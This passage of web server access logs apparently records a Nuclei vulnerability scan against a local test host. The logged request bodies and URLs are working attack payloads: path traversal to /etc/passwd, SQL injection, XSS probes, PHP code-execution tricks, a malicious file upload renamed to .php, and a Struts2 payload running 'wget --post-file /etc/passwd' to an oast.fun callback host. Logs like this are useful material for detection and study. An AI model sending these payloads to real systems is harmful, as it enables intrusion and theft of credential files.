HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /runningpods/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fiori HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /documentation/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"system.listMethods","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlrpc.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/21 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A wget\x0D\x0A --post-file\x0D\x0A /etc/passwd\x0D\x0A ca2u0eosmpv1jhs80ca0m3i6qqszcddrf.oast.fun\x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A java.lang.ProcessBuilder\x0D\x0A start\x0D\x0A \x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A 0\x0D\x0A 0\x0D\x0A false\x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /struts2-rest-showcase/orders/3 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /downloadfile.php?file=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_ID\x22\x0D\x0A\x0D\x0A1\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_FileUploadDir\x22\x0D\x0A\x0D\x0A/wp-content/uploads/simple-file-list/\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_Timestamp\x22\x0D\x0A\x0D\x0A1587258885\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_Token\x22\x0D\x0A\x0D\x0Aba288252629a5399759b6fde1e205bc2\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22nuclei.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect:http://www.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /store/app/etc/local.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /assets/php/profile.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/pdf-invoices/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ovirt-engine/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=elex-product-feed-manage&search=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jeecg-boot/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /irj/portal/fiori HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login.html?lang=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /express-graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A wget\x0D\x0A --post-file\x0D\x0A /etc/passwd\x0D\x0A ca2u0eosmpv1jhs80ca0cid951y4gck9f.oast.fun\x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A java.lang.ProcessBuilder\x0D\x0A start\x0D\x0A \x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A 0\x0D\x0A 0\x0D\x0A false\x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /orders/3 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"--871a4a346a547cf05cb83f57b9ebcb83\x0D\x0AContent-Disposition: form-data; name=\x22files\x22; filename=\x22test.tar\x22\x0D\x0A\x0D\x0A../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 0000000000000029N5mApPPecFZxTaWmuXezEvLoO\x0D\x0A--871a4a346a547cf05cb83f57b9ebcb83--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servlet/UploadServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vpn/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wabam HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /vendor/qcubed/qcubed/assets/php/profile.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"s=phpinfo()&_method=__construct&filter=assert","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?s=index/index/index HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"_=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"{\x22hapi\x22:{\x22username\x22:\x22Administrator\x22,\x22password\x22:\x22any_password\x22,\x22language\x22:\x22en\x22,\x22mode\x22:\x22gui\x22, \x22usesshkey\x22:true, \x22privatekey\x22:\x22any_privateky\x22, \x22passphrase\x22:\x22any_passphase\x22,\x22settings\x22:{\x22output_filter\x22:\x22passed\x22,\x22port_number\x22:\x22444\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /session/create HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /druid/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"username=admin&passwd=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sess-bin/login_handler.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/sess-bin/login_session.cgi", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vr2conf/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://ca2u0eosmpv1jhs80ca0tb56iy5aoupt8.oast.fun%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST 